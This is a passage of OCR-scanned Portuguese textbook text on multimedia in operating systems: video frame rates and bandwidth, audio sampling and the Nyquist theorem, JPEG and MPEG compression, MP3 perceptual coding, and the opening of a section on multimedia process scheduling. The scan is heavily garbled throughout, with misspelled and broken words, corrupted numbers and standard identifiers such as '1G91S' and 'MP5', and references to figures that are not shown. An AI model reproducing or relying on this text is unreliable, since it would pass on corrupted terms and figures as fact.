i rem u lara, pois o quadro desaparecera da reti na a mes que 
o próximo apareęa* Um fi lnie com 20 qu ad ros diferemes 
por segundo, cada qual desenliado qu.at.ro vezesseguidasa 


80 Hz, nao tremera, mas o movimento parecera espas- 
md di co, 

A imponancia desses dois parametros torna-se clara 
quando consideramos a largura de banda necessaria para 
transmilir video digital por uma rede. Os monitores atuais 
de computadores lem, todos, a taxa de aspeclo 4:3 e, assini, 
podem usar aqneles tubos de imagem baratos e produzidos 
em massa para o mercado de idevisores, Configuraęoes co- 
muns sao 640 x 480 (VGA), 800 x 600 (SVGA), 1.024 x 
768 (XGA) e 1.600 x L200 (UXGA). Uma lela UXGA com 
24 bits por pixel e 25 quadios/s precisa ser alimentada a 
1,2 Gbps, mas mesmo unia lela VCA precisa de 184 Mbps. 
Dobrar essa taxa para evitar iremulaęoes naoe uma medida 
interessante, Uma soluęao me! hor ć transmilir 25 quadros/s 
e fazer com que o compuiador armazene cada um deles e, 
entao, os desenhe duas vezes, A iransmissao de televisao 
nao usa essa estraiegia porque os televisores nao leni me- 
mória e, alem disso, sinais analógicos nao podem ser arma- 
zenados em RAM sem que ames sejam eon ve ni dos para 
a forma digitat, o que requer um hardware a mais. Como 
consequencia, o entrelaęamento e necessario para a difu- 
sao de tclcvisao, mas nao e necessario para o vfdco dlgitaL 

7.2,2 I Codifkacao de audio 

Uma onda son ora (audio) e uma onda acustica (de 
pressao) unidimensionafi Quando uma onda acustica 
adentra o ouvtdo T o tfmpano vibra, la zen do com que os pe- 
quenos ossos do ouvido interno vibrem tambem, enviando 
pulsos nervosos para o cerebro. Esses puls os sao percebidos 
como sous pelo oiwinie* Dc maneira semelhante, quando 
uma onda acustica atinge um microfone, este gera um si- 
nal eietrico representando a amplitudę do som como uma 
fimęao do tempo. 
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O intervalo de alcance de freqnenda do ouvido hu ma¬ 
no vai de 20 a 20 mil Hz; alguns animais, espedalmente os 
caes, padem ouvir frequenrias mais alias. A percepcao do 
ouvido se da cm escala logantmica; portanto, a proporęao 
dc dois sons com amplitudes A c B ć convenrionalmente 
expressa cm dB (decibeis), dc acordo com a formula 

dB = 20 log 1Q (/Vć?) 

Se definirmos o limite inlerior de audibilidade (urna 
pressao de aproximadamente 0,0003 dinas/cm-) para 
urna orni a senoidal de 1 kHz como 0 dB, urna corwersa 
comum atingiria aprox ima da menie 50 dB e o Umiar da doi 
seria cerca dc 120 dB — um intervalo dinamico dc um 
fator de um milhao. Para evitar qualquer coufusao, os va- 
tores A c B anteriores sao amplitudcs, Se usassemos o mvel 
de potencia, que e proporcional ao quadrado da amplitudę, 
o coefiriente do logariimo seria 10, e nao 20. 

As ondas de audio podem ser convertidas para a forma 
digital por um CAD {ma by digital w twe rter — conversor 
aiialógico-digita]), Um CAD terna uma voltagcm elćtrica 
como entrada e gera um numero binario como safda. Na 
Figura 7.4{a), vemos um exemplo de uma coda senoidal. 
Para represeniar esse sinal digital menie, podemos obter 
uma amostra dela a cada AT segundos, eon famie mostram 
as alturas das barras na Figura 7.4(b). Se uma onda sonora 
nao for uma senoidal pura, mas unia superposięao linear 
de ondas senoidais para asquais o componente de freqnen- 
cia mais alla tenha Ireąuencia/ entao basta amostra-las em 
uma freąuenria 2/1 Esse resultado foi provado matematica- 
mente por Harry Nyąuist, dentista do Bel] Labs, em 1924, 
c e conheddo como teorema de Nyąuist. Amostrar mais 
vezes nao adianta nada, pois nao existiriam freqiiencias 
mais alias que essa amostragem pudesse detectar. 

Amostras digitais nunca sao exatas. As amostras da 
Figura 7.4(c) permitem someme nove valores, de -L,00 a 
+ 1,00 em passos de 0,25. Conseąuentemente, sao ncces- 
sarios 4 bits para representar todos cleSn Uma amostra dc 
8 bits permitiria 256 valores diferentes. Uma amostra de 16 
bits permitiria 65.536 valores t O erro introduzido pdo nume¬ 
ro finito de bits por amostra e chamado de rufdo de ąuantb 
zaęao. Se esse rufdo for muito grandę, o ouvido o percebera. 


Dois exemplos bem conheddos de sons amostrados 
sao o tclefone e o audio de CDs. A modulaęao por codifi- 
caęao de pulso {pulse codę moduiation — PGM) e usada no 
sistema telefonico e utiliza amostras de 7 bits (na America 
do Norte e no Japao) au 8 bits (Europa), oito mil vezes por 
segundo. Esse sistema oferece uma taxa de dados de 56 mil bps 
ou 64 mil bps. Com somente oito mil amostras por segun¬ 
do, as freąuendas acima de 4 kHz sao perdidas. 

O audio dos CDs e digital, com taxa de amostragem 
dc 44.100 amostras/s, sufiriente para capturar freąuendas de 
a te 22.050 Hz — bom para pessoas, mas mim para caes. 
As amostras sao, cada uma, de 16 bits c lincares dc acordo 
com o imervalo de amplitud es, 0bserve que amostras de 
16 bits permitem somente 65.536 yalores difcientcs, mes- 
mo quc o intervalo dinamico do ouvido seja dc quase um 
milhao ąuando medido em passos do menorsom audfvel, 
Porta ma, usar somente 16 bits por amostragem inlroduz 
algtim nudo de ąuamizaęao (embora lodo o iniemlo di¬ 
namico nao seja cobcrto — CDs nao foram fcilos para ma- 
chucar). Com 44.100 amostras/s de 16 bits cada, um CD 
dc audio prccisa de uma largura de banda dc 705,6 Kbps 
para audio mono e 1,411 Mbps para estereo (veja a Tabela 
7.1 J, A compressao de audio 6 posstvel com base em mo- 
delos psicoacusticos da audięao humana. Uma compressao 
de de z vc7.es ć possivcl usando o sistema MPEG canta da 3 
(MP3). Aparelhos portateis que tocam musica nesse forma- 
to t orna ram-sc comum nos ultimos a nos, 

O som digitalizado pode ser fadlmente processado por 
computadores cm software. Existcm divcrsos programas 
para computadores pessoais que permitem que os usuarios 
gravem, reproduzarn, editem, misiu rem e armazenem em 
ondas sonoras a par tir de varias fontes, Praticamente loda 
gravaęao c cdięao dc som profissional hojc em dia c digital, 
O formato analógico esta praticamente mono. 



Compressao de video 


Agora, devc estar óbvio quc manipular materiał multi¬ 
mfdia sem compressao esta fora de questao — sen ta ma n ho 
c grandę dcmais, A iinica esperanta c ąueseja posstvel uma 
compressao macięa. Felizmente, um grandę corpo de pes- 
quisa, nas tiltimas decadas, tein proposto diversas tecnicas 




I Figura 7.4 (a) Uma onda senoidal. (b) Amostragem da onda senoidal. (o) Gua-ntizaęao das amostras em 4 bits. 
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e algoritmos de compressao que tornaram posswel a trans- 
missao de muhimfdia* Nesta seęao, estudaremos algims 
metodos de compressao de dados niiiltinndia, espedal- 
menie imagens. Fara mais detalhes, veja as seguintes pu- 
Micaęoes: Flnckigcr (1995) c Stdnmctz c Nahrstcdt (1995), 

Todos os sistemas de compressao precisam de dois al¬ 
goritmos: um para comprimir os dados na origcm e outro 
para descomprirni-los no deslino. Na literatura, esses algo- 
ritmos sao conhecidos como algoritmos de codificaęao e 
decodifkaęao, rcspcctivamentc. Aqui, tambćm usarcmos 
essa terminologia. 

Esses algoritmos tern certas assimeirias que precisam 
ser compreendidas* Primeiro, para muitas apUcaęoes, urn 
documentomuUimidia — por exemplo, urn fil me—sera co- 
diJicado somente urna vez {quaiido for armazenado no ser- 
vklor mukirnidia), mas sera decodificado mi I ha i es de vczcs 
{quando for assistldo pelos dientes). Essa assimetria revela 
que e aceitavel que o algoritmo de codificaęao seja lento 
e qne exija hardware sofisticado, desde que o algoritmo 
de decodifkaęao seja rapido e nao requeira um hardwa¬ 
re sofisticado* For outro lado, para niultimklias em tempo 
real, como yideoconferencia, e inaceitavel urna codificaęao 
lenta. A codificaęao deve ocorrer durante a própria video- 
confcrenria, em tempo rcai. 

Urna segtmda assimetria e que o processo codificaęao/ 
decodificaęao nao prccisa ser 100 por cento reversivei. Ou 
seja, no processo de comprimir, iransmitir e, en La o, des- 
comprimir um arquivo, o usuario cspcra obtcr o arquivo 
odginał novamente, prcdsamente ate o ultimo bil. Para 
multinridia, essa exigencia nao existe. fi perfeitamente 
accitavcl quc o sinal de vidco, dcpois da codificaęao c da 
consequente decodificaęao, rcsulte em um sinal um pouco 
diferente do originaL Quando a safda decodificada nao e 
cxatamente igual a entrada odginał, diz-se quc o sistcma 
apresenta perdas {lossy). Todos os sistemas de compressao 
usados para multimfdia apresentam pcrdas porąue oferc- 
cem urna compressao mu i to melhor. 

_7-3JJ O padrao JPEG 

O pa dra o JPEG {joint photographic expcrts group — gru¬ 
po conjumo dc espedalistas em fotografia) para compres¬ 


sao de imagens paradas de tons comuiuos (por exemplo, 
fotografias) foi deseńvolvido por especialistas na area con- 
j unia nieme pairocinados poroutros organismos dc padro- 
nizaęao, como 1TU, ISO e IOC. O pa dra o JPEG e impor- 
tantc para multiimdia porque, de modo geral, o padrao 
multimidia para imagens em movimento, MPEG, ć apcnas 
a codificaęao JPEG dc ca da quadro em sc pa rado, mais al- 
guns aspectos adidonais para compressao cntrc os quadros 
c dc compensaęao de movimcnto. O JPEG c dcfinido pcio 
Padrao Intcrnacional 1G91S. Sao quatro modos e muitas 
opęoes, mas aqui nos interessa apenas o modo geral como 
o JPEG e usado em vfdeos RGB de 24 bits. 

O passo l da codificaęao dc urna imagem cm JPEG ć 
a preparaęao do bloco. Para ser mais esperffico, suponlia 
que uma entrada JPEG seja urna imagem RGB de 640 x 480 
com 24 bits por pixd, conforme i lustra a Figura 7,5(a)* 
Como o uso de luminancia e de crominancia oferece uma 
melhor compressao, sao calculados a luminancia e dois 
sinais dc crominancia a partir dos valorcs RGB, Para o 
NTSC, esses sinais sao chamados Y , l e Q r respectiva men¬ 
ie* Para o PAL, sao chamados respectivamente de Y, U e V 
c as fórmulas sao diferentes. A scguir, usarcmos os nomcs 
correspoiideines ao NTSC, mas o algoritmo de compres¬ 
sao e o mesmo. 

Sao construidas matrizes scparadas para Y, i e Q, cada 
uma com clcmcntos cntrc 0 c 255. Em scguida, c calculada 
a media de todos os blocos quadrados de 4 pixds nas ma¬ 
trizes / e & reduzindo-as a matrizes 320 x 240. Essa redu- 
ęao aprescma pcrdas, mas isso difidlmente ć captado pela 
visao, pois o cl ho rcsponde mais a luminancia qne a ero- 
mina uda. Mesmo assirn, a compressao de dados ć por um 
faior de quatro + Emao, de cada elememo de todas as tres 
matrizes e subtrafdo 12S para qtie o 0 fique na metade do 
intervalo. Por firn, cada matriz e dividida em blocos de 8x8. 
A matriz Y tem 4.800 blocos; as outras duas tern 1.200 blo¬ 
cos cada, conforme mostra a Figura 7*5(b). 

O passo 2 do JPEG ć aplicar uma transformaęao DCT 
(discrete cos bu Iransfcrwation — transformaęao discreta de 
cosseno) para cada um dos 7,200 blocos sępa rada menie. A 
safda de cada DCT e uma matriz 8x8 dc coeficienlcs DCT* 
O elememo DCT (0, 0) e o valor medio do bloco. Os outras 
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Pixel de 24 bits 


Bloco 4739 


<b) 


Figura 7.5 (a) Entrada RGB. (b) Após a preparaęao do bloco. 
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elementos ind i ca m a quamidade de potencia espectrai 
presente em cada frequencia espacial. Para os leitores fa- 
miliarizados com a transformada de Fourier, oma DCI e 
uin lipo de transformada dc Fourier espacial Mdimcnsio- 
nal Tcoricamenie, uma DCT nao provoca perda s, mas, na 
pralka, o uso de numeros de ponto flutuanle e funędes 
transcendentais sempre introduzalgum erro de arredonda- 
nicnto que rcsuiia cm uma pcąucna perda dc iniormaęao. 
Normahnentc, esses elementos decaem rapidamenie a mc- 
dida que se distanciam da origem {0, 0), eon formę sugere 
a Figura 7.6(b). 

Uma vcz termiuada a DCT, o JPEG passara ao passo 
3, que e chamado de ąuantizaęao, no qual os coelicicn- 
les DCT menos iniportames sao eliminados. Essa transfor- 
maęao (com perda) e realizada dividindo-se cada uni dos 
coefkiemes da matriz DCT 8x8 por um peso tornado a 
partir de uma tabela. Se todos os pesos forem i, a trans- 
formaęao nao fara nada. Conuido, se os pesos crescercm 
abruptamente a partir da origem, as freąuenrias espadais 
mais alias serao rapidamenie reduzidas. 

Um exemplo desse passo e mostrado na Figura 7.7, em 
que vemos a matriz DCT inicial, a tabela de quamizaęao e 
o resuliado oblido dividindo-se cada elememo DCT pelo 
demento correspondente da tabela de quantizaęao. Os va- 
lores na tabela dc quantizaęao nao fazetn parte do padrao 
JPEG. Cada aplicaęao deve fornecer sua tabela dc ąuantiza- 



(a) 


I Figura 7.6 (a) Um bloco da matriz Y, (b) Os coeficientes DCT. 


ęao particular, possibilitando a essa aplicaęao controlar seu 
próprio compromisso entre perda e compressao. 

O passo 4 red u z o valor (0,0) de cada bloco (o pri metro 
no canto superior esquei do), subslituindo-o pelo tanio que 
ele difere do demento correspondente no bloco anterior, 
Como sao yalores mćdios de seus respectivos blocos, es- 
ses demem os devem mndar lemameme; portanto, assu- 
mir os yalores diferenciais deve reduzir a maioria deles a 
pequenos yalores. Nenhum di teren dal e ca Icula do a partir 
dos demais yalores. Os yalores (0, 0) sao conhecidos como 
componentes DC; os outros, como componentes AC. 

O passo 5 li neariza os 64 elementos e a pika a codifica- 
ęao run-kn§th a essa lista de elementos. Percorrer o bloco 
da esąuerda para a direita e de dma para baixo nao agnt- 
para os zeros; assim, e aplicado um padrao de yarredura 
emzigne-zague, como mostra a Figura 7.S. Nesse exemplo, 
o padrao zigue-zague resulta em 38 zeros consecutivos no 
finał da matriz. Essa ca dek pode ser reduzida a apenas um 
contador indicando que ha 38 zeros. 

Agora temos uma lista de numeros que representa a 
ima gem (no espaęo de iramformaęao). O passo 6 codilica 
a imagem, usantio o código de Huffman, para annazena- 
memo ou transmissao. 

O JPEG pode parecer complicado; isso ocorrc porquc o 
JPEG e complicado. Ainda assim, como produz uma eom- 
pressao de 20; l, ou atć me 1 hor, de modo que e amplamen- 



(b) 


Coefi cie ntes D CT Coefici entes q uantizados Tabela de qua n ti zaęao 
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I Figura 7.7 Processamento dos coeficientes DCT quantizados, 
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■ Figura 7.8 A ordem na qual cs valGre$ quantizados sao 
łransmitidos. 

te lisach. Decodifi car u ma imagcm JPEG rcąucra execuęao 
do algoritmo dc comprcssao dc tras para a frentc. O JPEG 
apresema unia certa simetria: leva quasc o mestno tempo 
para decodificar c codifkar uma imagcm. 

7.5.2 I 0 padrao MPEG 

Pinalmente, chegamos ao cerrie do que nos interessa: os 
padroes MPEG {motmi pknm expęrt$group — grupo de espe- 
tiaiistasem imagens em movimcnto). Trata-se dos prindpais 
algoritnios tisados para compriniir v id cos e sao padroes in- 
ternacionais dcsdc 1993. O MPEG-] (Padrao Imcrnocional 
11172) fol projetado para gerar saida dc ąualidadc para gra- 
vaęao dc video (352 x 240 para NTSC) usando uma taxa de 
transferenda de 1,2 Mbps, O MPEG-2 (Padrao Internationa] 
13818) foi projetado para compriniir vfdeo coni ąualklade 
de transmissao em taxas de 4 a 6 Mbps; desse modo, ele seria 
adeąuado para ca na i s de transmissao NTSC ou PAL. 

As duas versoes tiram vantagens dos dois lipos de re¬ 
dli ndancia que existem em imagens em movimerito: espa- 
cial e temporal. A redundancia espacial pode ser utilizada 
simplesmeme codificando cada quadro em sęparado com o 
JPEG, Pode haver uma compressao aditional resuiianie do 
fato de quc ąuadros consecutivos sao, muitas vezes, ąuase 
idćnticos (redundancia temporal). O sistema video digital 
{digital video — DV), empregado nas camcras digitais de vf- 
deo, usa somente o esąuema tipo JPEG, pois a codificaęao 
deve ser feita em tempo real e e miiiio rnais rapido codificar 
cada ąuadro separadamente. As conseąuentias dessa de- 
cisao podem ser visualizadas na Tabela 7.1: embora as ca- 
maras de vfdeo digitais lenbam uma iaxa de dados menor 
que a do vfdeo sem comprcssao, elas nao di ega m a ser tao 
boas quanto um MPEG-2 com ple to, (Para fazer uma com- 
paraęao, lembrc-sc dc quc as camaras digitais DV ofcrcccm 
uma amostra da luminanda com 8 bits c cada sinal dc cro- 
minancia com 2 bits, mas ainda ha um fator de comprcssao 
de cinco usando a codificaęao lipo JPEG.) 

Para cenas cm que a ca mara c o fundo sejam estacio- 
narios c um ou dois atores movam-se Icntamcmc, quasc 


todos os pixels serao identicos de um ąuadro para o outro. 
Nesse caso, apenas subtrair cada ąuadro do anterior e exe- 
cutar o JPEG na diferenęa funcioiiaria bcm. Gontu do, para 
cenas em que a ca mara faz panoramicas ou aproximaęoes P 
essa tćcnica nao sc mostra muito adcąuada. Ś necessario 
algom modo dc compensar esse modmento, c c cxa ta men¬ 
ie isso quc o MPEG faz — na verdadc, cssa ć a diferenęa 
entre o MPEG e o JPEG, 

A safda do MPEG-2 consiste em tres tipos diferentes 
de ąuadros qne devem ser processados pelo programa de 
visuadzaęao: 

1, I (Intracodificados): Imagens cstaticas autocontidas 
codifkadas por JPEG. 

2, P (Preditivos): Diferenęa bloco porbloco com o ulti¬ 
mo ąuadro. 

3, B (Bldirccionais); Diferenęas entre o ultimo e o pró- 
ximo ąuadro. 

Os ąuadros I sao apenas imagens estaiieas codifkadas 
pelo JPEG, usando tambem o sinal de luminanda com reso- 
luęao completa c a crominancia com a meta de da rcsoluęao 
ao longo dc cada cixo. Ra tres razoes que lornam ncccs- 
sario quc os ąuadros I apareęani pcriodicamcntc no lluxo 
dc safda. Primeiro, o MPEG pode ser usado para transmitir 
sinal dc televisao, cujos espectadores simonizam de acor- 
do com sua voruade, Se todos os ąuadros dependessem de 
seus predccessores des de o primeiro ąuadro, ąualąuer um 
ąue perdesse o primeiro ąuadro nunca mais poderia deco¬ 
dificar uenhum ąuadro subseąueiuc. Isso tornada impos- 
sfvd aos espectadores sintonizar urn canal com (limes que 
ja tivessem comeęado. Em segtmdo lugar, se algum ąuadro 
fosse recebido com erro, nao poderia mais haver dccodifi- 
caęao. Em tcrcciro lugar, sem os ąuadros I, durame avanęo 
ou reiroccsso rapidos, o decodificador teria dc calcu lar cada 
ąuadro pereorrido para que cle conbecesse todos os valores 
do ąuadro no qual esla parado. Com os ąuadros I, e possi- 
vd sal tar avanęando ou retrocedcndo atć que um ąuadro 
I seja encontrado e comeęar a visualizar a partir dcie. Por 
esses moitvos, os ąuadros l sao mseridos na saida uma ou 
duas vczes por segtmdo. 

Os ąuadros P, por outro lado, codificam diferenęas en¬ 
tre os ąuadros. Sao baseados na kicia de ma ero bloco s, 
ąue cobrem 16 x 16 pixełs no espaęo dc luminanda e 8 x S 
pixds no espaęo de crommantia. Urn macrobloco e codifi- 
cado buscando-se, nos ąuadros anicriorcs, um macrobloco 
identico ou com a (guma peąuena diferenęa. 

Um excmplo da utilidadc dos ąuadros P c ilustrado na 
Figura 7.9, Nela, vcmos tres ąuadros conseculivos que tern 
o mesmo fundo, mas sao diferentes ąuamo a posięao de 
urna pessoa. Essas cenas sao comuns ąuando a camera esta 
fixa sobre um tripe c os atores se movimeniam cm frcntc 
a cla. Os macroblocos ąue contem a cena de fundo serao 
idemicos, mas os macroblocos comendo a pessoa terao 
suas posięoes deslocadas por uma ąuanlidade dcsconheci- 
da e deverao ser acompanhados. 
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1 Figura 7,9 Tres ąuadros de video con$ecutivos. 


O pa dra o MPEG nao especifica como c onde buscar ou 
o grau de semelhanęa que deve ser considerado. Isso fica a 
crlierio de cada implementaęao. Por exempla, urna imple- 
memaęao pode buscar um macrobloco na posięao atual do 
quadro amerior, e lodas as outras posięoes deslocadas por 
±Ax na direęao xa ±Ay na direęao y. Para cada poslęao, po¬ 
dmą ser calcu lad o, na matriz de luminancia, o nuniero de 
valorcs iguais. A posięao com o rnaior valor seria declarada 
vencedora, desde que estivesse acima de um Umiar predefi- 
nido, Caso contrario, seria possfvd di zer que o macrobloco 
foi perdido. Ć dam que sao poydveis aigoritmos muilo mais 
sofisticados. 

Se algum macrobloco for encontrado, ele sera codifi- 
cado tomando-se a diferenęa com relaęao a sen valor no 
ąuadro amerior (para a luminancia c para ambas as cro- 
minancias). Essas matrizes de diferenęa sao, en tao, subme- 
tidas a codificaęao JPEG. O valor do macrobloco no fUixo 
de salda e, assim, o vetor de movimento (ąuanto o macro¬ 
bloco se tnoveu de sua posięao anterlor em cada direęao), 
seguido pelas diferenęas com o quadro amerior codificadas 
pelo JPEG. Sc o macrobloco nao for localizado no quad.ro 
amerior, sens va)ore$ serao codificados pelo JPEG, como se 
fosse um quadro L 

Os ąuadros B sao stmilares aos ąuadros P # só que eles 
permitem que o macrobloco de referenda esteja em um 
dos seguimes quadros: amerior ou sucessor, I ou P. Essa 
liberdade adicional permite a compensaęao melhorada do 
movimcnto e tambem ć util ąuando objetos passam pelo 
frente ou por tras de outros objęłoś. Por exemplo, em um 
jogo de beisebol ąuando o terceiro jogador da base arre- 
messa a bola para a primeira base, pode liaver alguns qua- 
dros nos quai$ a bola cbscurece a cabeęa do jogador que 
esia na segunda base, ao fundo. No próximo ąuadro, a ca¬ 
beęa pode estar parciałmente visivel, a esąuerda da bola, 
com a aproximaęao seguintc da cabeęa derivando-se do 
ąuadro posierior, ąuando a bola, entao, ja passou pela ca¬ 
beęa* Os quadros B permitem que um ąuadro seja baseado 
em um ąuadro futuro. 

Para fazer urna codificaęao do ąuadro B, o codifrcador 
precisa guardar, ao mesmo tempo, tres ąuadros codificados 
na memória: o passa do, o atual e o futuro. Para simpMcar 
a decodifieacao, os ąuadros devcm estar presem es, no 11 u - 
xo MPEG, cm ordom dc dcpendencta, o nao em ordom de 
exibięao. Portanto, mesmo com urna tcmporizaęao perfei- 
ta, ąuando um vfdco o visto pela rcdc r faz-sc necessario um 


armazenamento temporario na maąuina do usuario para 
reordenar os ąuadros c rcsultar em urna exibięao apropria- 
da. Por causa dessa difercnęa ciuro a ordom de dependen¬ 
ci a e a oi dem de exibięao, ton lar exibir um filme de iras 
para a frente nao fuiidonara, a nao ser quc sc disponha de 
um consideravcl armazenamento temporario c se u ii liże de 
aigoritmos complexos* 

Fil mes com multa aęao e cortcs rapidos (como os de 
guerra) demandam muitos ąuadros 1. Filmes nos quais o di- 
retor direciona a camera c pode sair para um cafe cnąuanto 
os alores rodła m suas la las (como os filmes romaniicos) 
podcm usar varios ąuadros dos tipos B e P, que ocupam 
muito menos espaęo do que os ąuadros I, Considerando a 
dkiencia do disco, urna empresa dc entretenimemo deve- 
ria concenirar suas produęoes nos filmes femininos. 



Com press a o de audio 


Conformc ja dissemos, a ąualidadc dc um CD dc audio 
rcqucr inna largu ta dc banda dc 1*411 Mbps, Esta claro 
que, para viabilizar a transmissao via Internet, e neccssa- 
da urna compressao substandal e, porconta disso, diversos 
aigoritmos de compressao de audio foram desenvolvidos, 
Provavelmente, o algorlimo mais popular e o de audio 
MPEG, que possui tres camadas (yariaędes), das quais a ca- 
mada MP5 (audio MPEG camada 3) e a mais poderosa 
e conhecida. Um grandę volume de musicas no formato 
MP3 esta disponiveI na Internet, algunias ilegalmente, o 
que resultou cm diversos proccssos por parte dos artistas e 
proprietarios dos dircitos autorais, O MP3 pcncncc a por- 
ęao dc audio do padrao dc compressao dc vtdco MPEG. 

A compressao de audio pode ser feita de duas formas. 
Na codifkaęao wavefołin, o sinal e transformado mate- 
matkamente por urna transformada de Fourier em seus 
componentes de freąuenda. A Figura 7.10 mostra um 
exemplo no qual sao apresentadas as primeiras 15 ampli- 
tudes dc Fourier para urna funęao de tempo. A amplitudę 
dc cada componcntc c, entao, codificada em urna forma 
minima, O olijetivo c reproduzir na outra extremidade o 
formato da onda de maneira prccisa e com a me nor quan- 
tidade possfvel de bifs. 


A outra forma, denominada codifkaęao perceptual, 
explora certas falhas do sistema auditivo hu mano para co- 
dificar o sinal, dc modo quc cle parcęa o mesmo aos ouvi- 
dos liinnanos, mesmo qne parcęa totalmcnte diferente cm 
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(a) 



W u mero harmonice 





$ harmónicos 



Nu mero harmónico 


Figura 7.10 (a) Um sinal birerio e a raiz quadrada media das ampfitudes de Fourier, (b)-(e) Sucessivas aproximaęóes ao sinal 
I originaL 


u ni osciloscópio. A codificaęao percepiual baseia-se na psi- 
coacustica — ciencia que estuda como as pessoas perce- 
bem o som. O MP3 esta baseado nesse tipo dc codificaęao. 

A prindpa! propriedade da codificaęao percepiual e 
que alguns sons podem mascarar oolros. Ima ginę que 
voce esta transmitindo imi eon certo de flanta a o vivo em 
nm dia qnentc dc verao. Dc repcntc, um grupo dc trafia- 
Ihadores próximos dali liga as firitadeiras c comcęa a per¬ 
lu r^r a rua. Ninguem niais consegue ouvir a Ha ma, ja quc 


sen som agora esta mascarado pelo das britadeiras. Para 
fms de transmissao, ja que nao se escuta mestno a flauia, 
basta que seja co diii ca da somente a banda de frequenda 
usada pdas firitadeiras. A isso chamamos mascaramento 
de frequencia — a liabilidade que um som allo de urna 
frequenda tern de mascarar um som mais baixo em o utrą 
freąuencia dc banda quc poderia ter sido ouvido na ausencia 
do som mais allo. Na verdade, a flauta eontlnuara nao sendo 
ouvida duranie certo tempo mesmo depois de as britadeiras 
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para rem, ja que o ouvido se desliga quando comeęa o baru- 
Iho e demora nm tempo fiuilo para se ligar novamente- Esse 
efetto e denominado mascaramento temporal. 

Para tornar esses cfeilos mais qmntitativos, imagine 
o experimento L Urna pessoa em um comodo silencioso 
coloca urn fone de ouvido conectado a urna płaca de som 
de computador. O computador gera urna onda senoidal 
pura a 100 Hz com potencia baixa, embora gradualmen¬ 
ie crescente. A pessoa e instmlda a pressionar urna teda 
qnando ouve um som. O computador registra o mvel attial 
de potencia e, cntao, repcie o experimento a 200 Hz, 300 Hz 
c todas as o u tras freąućnrias ate o limite da audięao hu ma¬ 
na. Depois dc realizado com diversas pessoas, o gratko log- 
-logque rcprcscnta quama potencia e nccessaria para quc 
um som seja ouvido Leni a aparenda mostrada na Figura 
7.11 {a). Urna comeąuencia direia dessa curva e que mmca 
sera necessario codificar n en Im ma [requencia cuja poten¬ 
cja es tej a abaixo da freqnenda nimi ma de audibilidade. Se 
a potencia de 100 Hz fosse 20 dB na Figura 7.11 (a}, por 
exemplo, ela poderia ser omitida na saida sem perda per- 
ceptfvel de ąualidade, visto que essa potencja esta abaixo 
do nivd minimo dc audibilidade. 

Agora constdere o experimenio 2. O computador exe- 
cuia novameme o experimemo i, mas desta vez com unia 
ojida senoidal de amplitudę frequente em, digamos, 150 Hz, 
sobreposta ao teste de freąuencia. O que descobrimos e que 
o nivel minimo de audibilidade para frequenrias próximas 
de 150 Hz aumenta, conforme mostra a Figura 7.11 (b). 

A comeąuencia dessa nova observaęao e que e possf- 
vel omitir cada vez mais frequencias no smal codificado e 
economizar bits, se controlarmos ąuais sinais estao sendo 
mascarados por sinais mais fortes em frequencias próxi- 
inas. Na Figura 7.11, o sinal a 125 Hz pode ser totalmente 
omitido na safda e ninguem conseguira perceber a diferen- 
ęa. Mesmo depois que um sinal poderoso para em alguma fre- 
ąuencia de banda, o conhedmento sobie as propriedades 
do mascaranicnto temporal nos permite continuar a omitir 
as frcqućndas mascaradas durante algum tempo cnąuanto 
o ouvido se rccupera. A cssenda da codificaęao MP3 ć apli- 
car a tran sfor ma da de Fourier no som para obi er a potencia 
a cada frcquenda c cntao, trammbir somente as freąuencias 


nao mascaradas, codificando esse som na menor quamida- 
de possivel de bits. 

De posse dessas informaęocs, podcmos agora vei de 
que forma e feita a codificaęao. A compressao de audio e 
feita com base na amostragem da onda a 32 kHz, 44, i kHz 
ou 4$ kHz« O primeiro nu mero e o ultimo sao arredonda- 
dos. O valor de 44,1 kHz e o que utilizamos em CDs de au¬ 
dio e foi escolhido porque e bom o bastante para capturar 
toda a informaęao de audio passfvel de audięao pelo ouvido 
humano. A amostragem pode ser feita em um ou dois ca- 
nais, em u ma das quatro configuraęoes a seguir: 

1. Monofonica (somente um lluxo de enirada)* 

2. Monofonica dual (urna trilha em ingles e outra em 
japones, por exemplo). 

3. Estereo (cada eanai compactado sepa rada menie). 

4. Estereo conjtmto (redundancja entre canais aha- 
menie explorada). 

Primeiro, escolhemos a iaxa dc bits, O MP3 consegue 
comprimir um CD estereo de rock a 96 kbps com perda 
dc ąualidade pouco pcrceptwel mesmo para os fas de rock 
sem perda a u diii va. No caso dc um eon cer lo de piano, 
pelo me nos 128 kbps sao necessarios. As situaęoes sao dt- 
ferentes porąue a razao sina bruki a para o rock e mu i to 
mais alta do quc para um eon certo dc piano (pela ótlca 
da engenharla, pelo menos w). Tambem 6 possivd optar 
por taxas de safda mais baixas e aceitar alguma perda de 
ąualidade, 

As amosiragens sao processadas em grupos de 1.152 
(cerca dc 26 ms sao necessarios). Cada um dos grupos pas¬ 
sa primeiro por 32 fitiros digiiais para obter 32 ban das de 
frcqucncia. Ao mesmo tempo, a entrada segue para um 
model o psicoaeiistieo com vistas a deierminar as frequcn- 
cias mascaradas. Em seguida, cada urna das 32 bandas de 
frequeneia e transformada novamenie para ofcrecer urna 
mdhor resoluęao espectral. 

Na fasę segulnte, o nu mero total de bits disponfveis e 
dividido pelas bandas, com um mim ero maior reservado 
para as bandas com a maior potencia espcctral sem masca- 
raniemo, menos bits alocados a bandas sem mascaramento 
com menos potencia espearal e sem bits alocados a bandas 



I Figura 7.11 (a) Nivei minimo de audibilidade como funęao da frequ#ncfa. (b) O efeito mascaramento. 
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mascaradas. Finalmente, os bits sao codificados utłlizando 
o metodo Huffman, que atribui peąuenos códigos aos nu- 
meros que apaiecem frequentemente e códigos longos aos 
que apareccm esporadicamcmc. 

Ha mais da pas cnvolvidas. Yarias tecnicas tambćm sao 
usadas na reduęao do ruido e da distoręao {anńaUańng) e 
na exploraęno da redundancja enire canais, sc possivel, mas 
isso esta alćrn do eseopo des te Iivro< 

RU Escalonamento de processos 
multimfdia 

Os sistemas operacionais quc dao su poi te multimfdia 
dilerem dos tradicionais por tres aspectos prindpais: pclo 
escalonamento de processos, pęki sistema de arqmvos e 
pele escalonamento do disco, Imciaremos, nesta seęao, com 
o escalonamento de processos e prosseguiremos com os 
outros tópicos nas seęoes siibsequentes. 

_ 7-5.1 I Escalonamento de processos 

homogeneos 

O lipo mais simples de semdor de video e aąuele ca- 
paz de suportar a exibięao de urn numero fixo de filmes, 
todos com a mesma taxa dc quadros, a mesma resoluęao 
de yfdeo, a mesma taxa de dados e outros para metr os. Sob 
essas dromstanrias, um algoritmo de escalonamento sim¬ 
ples mas efeliyo e como o descrito a seguir. Para cada fil me, 
